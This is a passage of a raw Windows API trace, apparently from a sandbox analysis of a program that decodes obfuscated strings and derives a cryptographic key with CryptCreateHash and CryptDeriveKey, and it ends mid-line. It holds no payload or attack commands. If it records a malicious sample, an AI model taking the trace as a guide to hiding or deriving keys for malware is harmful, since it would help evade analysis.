[0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.095] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.095] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.096] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.096] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.096] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.097] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.099] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0196.099] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.100] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.100] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.100] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.100] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.100] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.100] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.101] CryptHashData (hHash=0xaa5660, pbData=0x24b2da8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.101] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.102] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.102] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.102] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.102] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.103] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.103] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.103] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.103] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.103] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.103] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.103] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0196.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.104] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0196.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: 